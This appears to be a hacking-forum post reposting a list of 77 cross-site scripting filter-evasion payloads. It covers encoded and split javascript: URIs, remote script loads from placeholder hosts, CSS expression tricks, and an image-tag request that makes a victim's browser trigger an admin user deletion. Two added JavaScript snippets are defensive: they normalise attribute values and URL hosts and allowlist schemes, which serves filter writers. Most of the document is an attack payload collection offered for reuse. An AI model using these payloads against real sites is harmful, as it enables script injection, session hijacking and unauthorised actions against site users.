There doesn't seem to be much XSS material on t00ls, so I'm copying over some good stuff I came across; not sure whether anyone needs to bookmark it.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag using the JavaScript directive
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (the semicolons are required here)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (XSS calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (XSS calculator)
<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (XSS calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex encoding without semicolons (XSS calculator)
<IMG SRC=java..omitted..XSS')>
(11) Embedded tab to break up the JavaScript directive
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab to break up the JavaScript directive
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multiline injected JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around length limits (all the pieces must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2 (null bytes are basically ineffective here in practice, since there is nowhere to use them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the JavaScript in an IMG tag
<IMG SRC=" javascript:alert('XSS');">
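The point of items 4 to 19 is that a filter which looks for the literal string javascript: in the raw attribute value sees nothing, while the browser decodes the character references, throws away tabs, newlines, NULs and other control characters, and then happily runs the script. The check below is an added example (mine, not from the original post): it decodes the attribute value the way the browser does, strips the characters the browser ignores, and then allowlists the scheme instead of blocklisting it. The sample payloads are the ones from the list above; the hosts in them are placeholders. Runs under Node.js with no dependencies.

```javascript
// Added example, not from the original post: why a substring check for
// "javascript:" misses the encoded/split variants above, and what a
// normaliser that mimics the browser's attribute + URL handling catches.

const NAMED = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'", tab: '\t', newline: '\n' };

// Decode HTML character references as a browser does inside an attribute
// value. Numeric references (decimal &#106; or hex &#x6A;) decode with or
// without the trailing semicolon (items 9 and 10 rely on that); named
// references need the semicolon.
function decodeEntities(s) {
  return s.replace(/&#x([0-9a-f]+);?|&#([0-9]+);?|&([a-z]+);/gi, (m, hex, dec, name) => {
    if (hex !== undefined || dec !== undefined) {
      const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
      return cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    }
    const v = NAMED[name.toLowerCase()];
    return v === undefined ? m : v;
  });
}

// Characters a browser drops or skips when it reads a URL out of an
// attribute: C0 controls, space and DEL (items 11-14, 17, 19) plus the
// non-ASCII spaces old IE accepted before the directive (list in item 47).
const IGNORED = /[\u0000-\u0020\u007f\u00a0\u2000-\u200b\u3000\ufeff]/g;

// Lower-cased URL scheme after normalisation, or null for a relative URL.
function scheme(value) {
  const cleaned = decodeEntities(value).replace(IGNORED, '');
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(cleaned);
  return m ? m[1].toLowerCase() : null;
}

// Allowlist: relative URLs and http(s) only. javascript:, vbscript:, data:
// and any scheme invented later are all rejected.
function isSafeUrl(value) {
  const s = scheme(value);
  return s === null || s === 'http' || s === 'https';
}

// The kind of check the cheat sheet is written to defeat: look for the
// scheme at the start of the raw value, case-insensitively.
function naiveBlocks(value) {
  return /^javascript:/i.test(value.trim());
}

// Constructed sample inputs: cheat-sheet variants plus two benign URLs.
const SAMPLES = [
  "javascript:alert('XSS')",                                                     // (3)
  "JaVaScRiPt:alert('XSS')",                                                     // (4)
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", // (5)
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",       // (10)
  "jav\tascript:alert('XSS')",                                                   // (11)
  "jav&#x09;ascript:alert('XSS')",                                               // (12)
  "jav&#x0A;ascript:alert('XSS')",                                               // (13)
  "jav&#x0D;ascript:alert('XSS')",                                               // (14)
  "java\u0000script:alert('XSS')",                                               // (17)
  " &#14;  javascript:alert('XSS')",                                             // (19)
  "http://3w.org/XSS/xss.js",                                                    // benign
  "/images/a.jpg",                                                               // benign
];

// Runs both checks over the samples; one row per input.
function compare(samples = SAMPLES) {
  return samples.map((v) => ({ value: v, scheme: scheme(v), naive: naiveBlocks(v), allowlist: !isSafeUrl(v) }));
}

for (const row of compare()) {
  console.log(`naive:${row.naive ? 'BLOCK' : 'pass '}  allowlist:${row.allowlist ? 'BLOCK' : 'pass '}  ${JSON.stringify(row.value)}`);
}
```

The naive check stops two of the ten hostile values; the normaliser stops all ten and still passes the two benign ones. Note that the allowlist is what makes this robust: a decoder plus a blocklist would still need updating for every new scheme (vbscript:, data:, item 40 and friends).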
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh to a URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters (decimal code points 1-32, 34, 39, 160, 8192-8203, 12288 and 65279 are accepted between the opening parenthesis and the javascript: directive)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) IMG STYLE with expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything that starts with an open angle bracket and a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression
expression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag: you can embed a Flash file that contains the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside the Flash file can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as your XSS vector
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JavaScript gets filtered, you can put the JavaScript inside an image file and load that as the script
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command: the victim's browser fetches the URL with the victim's cookies, so whatever that URL does (for example an admin-only delete) runs with the victim's privileges
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command 2 (a.jpg is on the same server; an Apache Redirect rule, for example in .htaccess, turns the image request into the command)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing filters on angle brackets and quotes
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL string evasion: IP address instead of hostname
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) Dword (decimal) IP address
<A HREF="http://3232235521">XSS</A>

(71) Hex IP address
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP address
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding (a newline and tabs inside the URL, octets in decimal, octal and hex)
<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>

(74) Leaving out "http:"
<A HREF="//www.google.com/">XSS</A>

(75) Leaving out "www"
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name (trailing dot)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
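Items 68 to 77 all defeat the same mistake: comparing the raw href against a hostname string. The browser first strips tabs and newlines from the URL, percent-decodes the host, and accepts an IPv4 address written as a single number or as dotted octal/hex/decimal, so 3232235521, 0xc0.0xa8.0x00.0x01 and 0300.0250.0000.0001 are all 192.168.0.1 and 6\t6.000146.0x7.147 is 66.102.7.147. The canonicaliser below is an added example (mine, not from the original post). It follows the WHATWG URL parser for whitespace stripping, percent-decoding and the IPv4 number forms, and additionally drops a trailing dot because DNS resolves both spellings identically (item 76). The hosts are the placeholders from the list above. Runs under Node.js with no dependencies.

```javascript
// Added example, not from the original post: canonicalise the host of an
// href so that a same-site / allowlist check compares against what the
// browser will actually connect to, not against the obfuscated string.

// One dotted-IPv4 part: 0x.. is hex, a leading 0 is octal, else decimal.
// Returns NaN when the part is not a number in that base.
function parseIpv4Part(p) {
  if (/^0x[0-9a-f]*$/i.test(p)) return p.length === 2 ? 0 : parseInt(p.slice(2), 16);
  if (/^0[0-9]+$/.test(p)) return /^0[0-7]+$/.test(p) ? parseInt(p, 8) : NaN;
  if (/^[0-9]+$/.test(p)) return parseInt(p, 10);
  return NaN;
}

// Dotted or single-number IPv4 -> "a.b.c.d", or null when the host is a
// name. The last part carries the remaining bytes, so "3232235521" and
// "192.168.1" (=192.168.0.1) are both accepted, as the browser does.
function canonicalIpv4(host) {
  const parts = host.split('.');
  if (parts.length > 1 && parts[parts.length - 1] === '') parts.pop();
  if (parts.length < 1 || parts.length > 4) return null;
  const nums = parts.map(parseIpv4Part);
  if (nums.some(Number.isNaN)) return null;
  const last = nums.pop();
  if (nums.some((n) => n > 255) || last >= 256 ** (4 - nums.length)) return null;
  let v = last;
  nums.forEach((n, i) => { v += n * 256 ** (3 - i); });
  return [24, 16, 8, 0].map((s) => Math.floor(v / 2 ** s) % 256).join('.');
}

// Strip what the URL parser strips, pick out scheme and host, percent-decode
// the host, lower-case it, drop the trailing dot and fold IPv4 forms.
// Returns { scheme, host, ipv4 }; scheme is null for protocol-relative and
// relative URLs, host is null when there is no authority (javascript:, a path).
function canonicalize(raw) {
  let s = raw.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '').replace(/[\t\n\r]/g, '');
  let scheme = null;
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(s);
  if (m) { scheme = m[1].toLowerCase(); s = s.slice(m[0].length); }
  if (!s.startsWith('//')) return { scheme, host: null, ipv4: null };
  // Authority ends at the first slash, query or fragment; drop userinfo and port.
  let host = s.slice(2).split(/[/?#]/)[0];
  host = host.slice(host.lastIndexOf('@') + 1).replace(/:\d*$/, '');
  try { host = decodeURIComponent(host); } catch (e) { /* malformed %xx: keep as-is */ }
  host = host.toLowerCase().replace(/\.$/, '');
  const ipv4 = canonicalIpv4(host);
  return { scheme, host: ipv4 || host, ipv4 };
}

// Allowlist check on the canonical host. Only http(s) or protocol-relative
// links can pass; a relative path counts as same-site.
function linkAllowed(raw, allowedHosts) {
  const { scheme, host } = canonicalize(raw);
  if (scheme !== null && scheme !== 'http' && scheme !== 'https') return false;
  if (host === null) return scheme === null;
  return allowedHosts.includes(host);
}

// Constructed samples: the hrefs from items 68-77 plus a percent-encoded host.
const SAMPLES = [
  'http://127.0.0.1/',                                       // (68)
  'http://%33w.org/',                                        // (69), constructed
  'http://3232235521',                                       // (70)
  'http://0xc0.0xa8.0x00.0x01',                              // (71)
  'http://0300.0250.0000.0001',                              // (72)
  'h\ntt\tp://6\t6.000146.0x7.147/',                         // (73)
  '//www.google.com/',                                       // (74)
  'http://google.com/',                                      // (75)
  'http://www.google.com./',                                 // (76)
  "javascript:document.location='http://www.google.com/'",   // (77)
];

for (const href of SAMPLES) {
  const c = canonicalize(href);
  console.log(`${JSON.stringify(href)} -> scheme=${c.scheme} host=${c.host} allowed=${linkAllowed(href, ['www.google.com'])}`);
}
```

Run it and the three IP spellings from items 70 to 72 collapse to the same host, item 73 decodes to 66.102.7.147, items 74 and 76 both come out as www.google.com, and item 77 is rejected on the scheme before the host is even looked at. The lesson for the filter side is the same as for the javascript: variants: normalise first, then compare against an allowlist.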